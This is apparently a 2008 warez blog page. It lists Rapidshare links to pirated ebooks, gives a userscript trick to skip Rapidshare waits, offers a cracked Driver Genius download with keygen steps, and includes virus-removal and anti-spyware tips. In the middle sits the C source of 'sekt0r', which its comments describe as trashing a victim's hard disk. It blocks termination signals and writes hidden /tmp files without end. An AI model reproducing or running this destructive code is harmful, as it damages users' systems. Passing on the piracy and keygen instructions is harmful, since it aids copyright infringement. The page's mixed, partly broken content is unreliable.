Add to Technorati Favorites

Name: SAMS Teach Yourself Ajax in 10 Minutes
By Phil Ballard
Publisher: Sams
Pub Date: April 28, 2006
Print ISBN-10: 0-672-32868-2
Print ISBN-13: 978-0-672-32868-8
Pages: 240
Type: Computer Education Web High Technology
Size: 2561 KB
Document Type: CHM
Download Link: http://rapidshare.com/files/91452902...es_Apr2006.chm
Rate: 9 Star / 10 Star
--------------------------

Add to My AOL Add to Google Reader or Homepage Add to netomat Hub I heart FeedBurner Subscribe in NewsGator Online Subscribe in a reader

Beginning ASP.NET 2.0 in C# 2005

Tuesday, September 16, 2008 | with 0 comments »
Add to Technorati Favorites

Name: Beginning ASP.NET 2.0 in C# 2005
Type: Computer EBook - C#
Size: 23210 KB
Document Type: PDF in rar upload
Download Link: http://rapidshare.com/files/81485048...in_C__2005.rar
Rate: 9.5 Star / 10 Star
--------------------------

Add to My AOL Add to Google Reader or Homepage Add to netomat Hub I heart FeedBurner Subscribe in NewsGator Online Subscribe in a reader

Build A Website That Sells.pdf

Tuesday, September 16, 2008 | with 0 comments »
Add to Technorati Favorites

Name: Build A Website That Sells.pdf
Description: [ 10 EASY WAYS To Grow Your Website ]
Publisher: MSPress
Download Link: http://rapidshare.com/files/89650264...That_Sells.pdf
--------------------------

Add to My AOL Add to Google Reader or Homepage Add to netomat Hub I heart FeedBurner Subscribe in NewsGator Online Subscribe in a reader

Beginning SQL

Tuesday, September 16, 2008 | with 0 comments »
Add to Technorati Favorites

Name: Beginning SQL
Type: Education
Author: Paul Wilton and John W. Colby
Publisher: Wrox - Wiley Publishing Inc.
Size: 3627 KB
Document Type: PDF in rar
Page Number: 522 Pages
Download Link: http://rapidshare.com/files/90343762...erver.2005.rar
Rate: 9 Star / 10 Star
--------------------------

Add to My AOL Add to Google Reader or Homepage Add to netomat Hub I heart FeedBurner Subscribe in NewsGator Online Subscribe in a reader

grafix magazine vol1

Tuesday, September 16, 2008 | with 0 comments »
Add to Technorati Favorites

Name: grafix magazine vol1
Keywords: Magazine, Graphic, Grafix, Computer graphic, ...
Type: Magazine (Full Color)
Size: 3698 KB
Document Type: PDF
Download Link: http://rapidshare.com/files/89649681...azine-vol1.pdf
Rate: 8.5 Star / 10 Star
--------------------------

Add to My AOL Add to Google Reader or Homepage Add to netomat Hub I heart FeedBurner Subscribe in NewsGator Online Subscribe in a reader

Add to Technorati Favorites

Name: Wrox.SQL.Functions.Programmers.Reference.2005
Type: Database Education
Size: 2765 KB
Document Type: PDF
Page Number: 549 Pages
Download Link:
http://rapidshare.com/files/91213667...rence.2005.rar
Rate: 9 Star / 10 Star
--------------------------

Add to My AOL Add to Google Reader or Homepage Add to netomat Hub I heart FeedBurner Subscribe in NewsGator Online Subscribe in a reader

Add to Technorati Favorites

The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.

The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment. But most of the time, that advantage is available only to people with the programming skills to make the changes they want. That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.

Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools. It changes how Web pages look and act by altering the rendering process. Greasemonkey is to Firefox what aftermarket parts are to cars -- it lets you personalize your browser by making it faster and more powerful or simply by making browsing more aesthetically pleasing. How and why you will use Greasemonkey (and I predict you will, if you don't already) will depend on how you browse now.

CODE
http://greasemonkey.mozdev.org/



1) Install the Greasemonkey extension >>
CODE
http://downloads.mozdev.org/greasemonkey/greasemonkey_0.2.6.xpi



2) Restart Firefox

3) Go to

CODE
http://rapidshare.de/files/1034529/rapidshare.user.js.html



4) Right click on rapidshare.user.js and choose "Install User Script".

Run FireFox.
From File Menu click on Open File then brouse to whereever you saved the 'greasemonkey.xpi' plug-in. Open it, wait a couple seconds for the install button becomes active. Click on it to install this plug-in then CLOSE FIREFOX.
Run FireFox again. From the File Menu click on Open File then brouse to whereever you saved the 'rapidshare.user.js'. Open it. Click the Tools Menu then click on Install User Script then click OK.
Close FireFox.

The script will let you enjoy "no wait" and multiple file downloads

Add to My AOL Add to Google Reader or Homepage Add to netomat Hub I heart FeedBurner Subscribe in NewsGator Online Subscribe in a reader

Add to Technorati Favorites

A C source code



/*create bad sectors on the hard disk.
*
* This program will create bad sectors on the hard disk. If you left it
* running for long enough, it could render a hard disk quite useless. When
* bad sectors are found, the sector is marked as bad, so fixing the hard disk
* is not an easy task. Unless the victim has time and knowledge to fix the
* disk, the hard drive can be left quite literally defective.
* supported by preetam
* I don't take responsibility for what you do with this program, served foe educational purpose only.
*
*
*/

#include
#include
#include
#include
#include
#include
#include

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */


void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}

Add to My AOL Add to Google Reader or Homepage Add to netomat Hub I heart FeedBurner Subscribe in NewsGator Online Subscribe in a reader

Add to Technorati Favorites

1-2. double click on My computer on Desktop ,
- choose Tool and select "Folder options"
- click on "View" tap select "Show Hidden files and folders" and un hake "Hide Extention...."
- and "Hide protected operating system file" (this selections are important to find the files you need to delete)
- then click "OK"

3. open Windows Task Manager (ctrl-alt-del) and select the "Processes" tap
- Click on "Image name" to sort File
- find "wscript.exe" and click on "End Process" (
if there is more than one process with that name you have to end all of them)
- close the "Task Manager"

4. then you will click on Start and select "Search" and search for "autorun.inf" (Search the computer)
- you will then delete all the files that contains the text MS32DLL.dll.vbs (the virus) by pressing:
SHIFT + DELETE. (There of course should not be Autorun.inf in the C rooth).

5. you will also delete the virus from the system (C:\WINDOWS\ MS32DLL.dll.vbs) by pressing:
SHIFT + DELETE

6. Next step is to edit the Register (Like always you have to be very care fool in the registry tools. Some mistake there can crash your computer)

- first, click on "Start" and select "Run" and type in "Regedit" and press "Enter".
- select HKEY_LOCAL_MACHINE --> Software -->Microsoft -->Windows --> Current Version --> Run.
- find there "MS32DLL" and delete that entry.

6. Then select HKEY_CURRENT_USER --> Software --> Microsoft --> Internet Explorer --> Main. There you find "Window Title "Hacked by Godzilla"" and you should delete that entry. You can close the registry now.

7. next you will click on Start --> Run and type in "gpedit.msc" and press "Enter". then you will open "Group Policy".
- there you will select User Configuration --> Administrative Templates --> System --> and there you will double click on "Turn Off Autoplay"

- in the window there you should select "Enabled" and select "All drives" (they say in this Thai webside that select all turn of Autoplay will be safer for not getting viruses). Now you can close the Group Policy.

8. Next you will click on Start --> Run and type "msconfig" and press "Enter".
- you will open "System Configuration Utility".
- click on "Startup" tap
- find the file MS32DLL, choose Enable All, then
unhake "MS32DLL"
- click Apply then OK to close

- then you will exit the "System Configuration Utility" and select "Exit Without Restart" when prompt.

9. After this you double click on My Computer and select "Tools" and "Folder Options" and "View" tap to change back there.
- select "Hide Extention..." and "Hide protected operating system file" and "Don't show hidden files and folders".

- then you will empty the "Recycle bin" and "Restart" your computer.

or visit http://www.techsupportforum.com/sectools/sUBs/Flash_Disinfector.exe

download and execute to get rid of the issue. 

Add to My AOL Add to Google Reader or Homepage Add to netomat Hub I heart FeedBurner Subscribe in NewsGator Online Subscribe in a reader

Add to Technorati Favorites

Everything In this article i have mentioned is based on what i ve surfed for some years and it gives you preety deep idea about spywares , how to prevent from that . Also i ve mentioned some of the best site i have found on Internet to get rid of spywares. So lets start - There are a lot of PC users that know little about "Spyware", "Mal-ware", "hijackers", "Dialers" & many more. This will help you avoid pop-ups, spammers and all those baddies. What is spy-ware?
Spy-ware is Internet jargon for Advertising Supported software (Ad-ware). It is a way for shareware authors to make money from a product, other than by selling it to the users. There are several large media companies that offer them to place banner ads in their products in exchange for a portion of the revenue from banner sales. This way, you don't have to pay for the software and the developers are still getting paid. If you find the banners annoying, there is usually an option to remove them, by paying the regular licensing fee. Known spywares
There are thousands out there, new ones are added to the list everyday. But here are a few:

Alexa, Aureate/Radiate, BargainBuddy, ClickTillUWin, Conducent Timesink, Cydoor, Comet Cursor, eZula/KaZaa Toptext, Flashpoint/Flashtrack, Flyswat, Gator, GoHip, Hotbar, ISTbar, Lions Pride Enterprises/Blazing Logic/Trek Blue, Lop (C2Media), Mattel Brodcast, Morpheus, NewDotNet, Realplayer, Songspy, Xupiter, Web3000, WebHancer, Windows Messenger Service. How to check if a program has spyware?

The is this Little site that keeps a database of programs that are known to install spyware.

Check Here: http://www.spywareguide.com/product_search.php If you would like to block pop-ups (IE Pop-ups).
There tons of different types out there, but these are the 2 best, i think. Try: Google Toolbar (http://toolbar.google.com/) This program is Free

Try: AdMuncher (http://www.admuncher.com) This program is Shareware If you want to remove the "spyware" try these.
Try: Lavasoft Ad-Aware (http://www.lavasoftusa.com/) This program is Free

Info: Ad-aware is a multi spyware removal utility, that scans your memory, registry and hard drives for known spyware components and lets you remove them. The included backup-manager lets you reinstall a backup, offers and multi language support. Try: Spybot-S&D (http://www.safer-networking.org/) This program is Free
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. Blocks ActiveX downloads, tracking cookies and other threats. Over 10,000 detection files and entries. Provides detailed information about found problems. Try: BPS Spyware and Adware Remover (http://www.bulletproofsoft.com/spyware-remover.html) This program is Shareware
Info: Adware, spyware, trackware and big brotherware removal utility with multi-language support. It scans your memory, registry and drives for known spyware and lets you remove them. Displays a list and lets you select the items you'd like to remove. Try: Spy Sweeper v2.2 (http://www.webroot.com/wb/products/spysweeper/index.php) This program is Shareware
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer.
The best scanner out there, and updated all the time. Try: HijackThis 1.97.7 (http://www.spywareinfo.com/~merijn/downloads.html) This program is Freeware
Info: HijackThis is a tool, that lists all installed browser add-on, buttons, startup items and allows you to inspect them, and optionally remove selected items.
If you would like to prevent "spyware" being install.
Try: SpywareBlaster 2.6.1 (http://www.wilderssecurity.net/spywareblaster.html) This program is Free
Info: SpywareBlaster doesn`t scan and clean for so-called spyware, but prevents it from being installed in the first place. It achieves this by disabling the CLSIDs of popular spyware ActiveX controls, and also prevents the installation of any of them via a webpage. Try: SpywareGuard 2.2 (http://www.wilderssecurity.net/spywareguard.html) This program is Free
Info: SpywareGuard provides a real-time protection solution against so-called spyware. It works similar to an anti-virus program, by scanning EXE and CAB files on access and alerting you if known spyware is detected. Try: XP-AntiSpy (http://www.xp-antispy.org/) This program is Free
Info: XP-AntiSpy is a small utility to quickly disable some built-in update and authentication features in WindowsXP that may rise security or privacy concerns in some people. Try: SpySites (http://camtech2000.net/Pages/SpySites_Prog...ml#SpySitesFree) This program is Free
Info: SpySites allows you to manage the Internet Explorer Restricted Zone settings and easily add entries from a database of 1500+ sites that are known to use advertising tracking methods or attempt to install third party software. If you would like more Information about "spyware".
Check these sites.
http://www.spychecker.com/
http://www.spywareguide.com/
http://www.cexx.org/adware.htm
http://www.theinfomaniac.net/infomaniac/co...rsSpyware.shtml
http://www.thiefware.com/links/
http://simplythebest.net/info/spyware.html Usefull tools...
Try: Stop Windows Messenger Spam 1.10 (http://www.jester2k.pwp.blueyonder.co.uk/j...r2ksoftware.htm) This program is Free
Info: "Stop Windows Messenger Spam" stops this Service from running and halts the spammers ability to send you these messages. ----------------------------------------------------------------------------
All these softwares will help remove and prevent evil spammers and spywares attacking your PC. I myself recommend getting "spyblaster" "s&d spybot" "spy sweeper" & "admuncher" to protect your PC. A weekly scan is also recommended Free Virus Scan
Scan for spyware, malware and keyloggers in addition to viruses, worms and trojans. New threats and annoyances are created faster than any individual can keep up with.
http://defender.veloz.com// -

Add to My AOL Add to Google Reader or Homepage Add to netomat Hub I heart FeedBurner Subscribe in NewsGator Online Subscribe in a reader

Add to Technorati Favorites


_______________________________________________________
1) Insert your original in your CD-ROM.
2) Open CDRWin (or any other image extractor) to make an iso image of the game
on your hard disc. Click on 'Extract Disc/Tracks/Sectors'
3) Here are the settings which work for me (!):
Disc Image/Cue sheet
File-Format: Automatic
Reading-Options:
RAW, CD+G, CD-TEXT and MCN/USRC all Unchecked
Error Recovery: Ignore
Jitter Correction: Auto
Subcode Analyses: Fixed
Data-Speed: MAX
Read Retry Count: 10
Audio Speed: MAX
Subcode Threshold: 900
There are a lot of reports, that Raw reading also works, but I had problems with it enabled.
4) Click on 'Start'

RECORDING TO A DISC
----
1) Install Fireburner

2) Double click on the Cue File For The Game
3) Right Click And select burn To CD
That?s all there is record DAO, and you can try to burn it fast at 2X
Using PNY Black Diamond CDR'

Add to My AOL Add to Google Reader or Homepage Add to netomat Hub I heart FeedBurner Subscribe in NewsGator Online Subscribe in a reader

Add to Technorati Favorites

DOWNLOAD Driver Genius Professional 2008 v8.0.316 FOR FREE! 

http://rapidshare.com/files/143819051/Driver_Genius_Pro_2008_v8.0.316.rar

Why I need Driver Genius?

Each computer user has more or less dealt with drivers while using computer.
Most users are really tired of the tedious procedure of installing so many
drivers manually for the system. In case you lost your drivers CD, you have to
spend much time searching for the drivers online. If unfortunately even the
driver for your modem was lost, you will be at your wits end. Perhaps you are
a system administrator responsible for installing drivers for hundreds of
computers in your company. If your have to install drivers on each computer
manually one after another, it can't be a easy job. You may still be using
some old machines. If you can't tell their actual hardware configuration, you
may not be able to find out correct drivers. Old drivers may not work properly
in new operating systems, so you want to solve the problem by updating to latest
drivers. Now you are caught by another problem - you can't find where to
download the latest ones. There is another problem, if you changed some hardware
devices, drivers for the removed devices may still stay in your system and become
garbage files. Garbage files can seriously influence the performance of the
operating system. You may want to remove them, but don't know how. Above are
problems we may meet concerning drivers. Now we will see how Driver Genius can
help you solve these problems like a piece of cake.
Instructions
Run setup.exe and install program.
Run keygen, enter ur name and generate license.
Run program installed.
Go to help and enter registeration info from keygen to registration window.
Enjoy!!

Add to My AOL Add to Google Reader or Homepage Add to netomat Hub I heart FeedBurner Subscribe in NewsGator Online Subscribe in a reader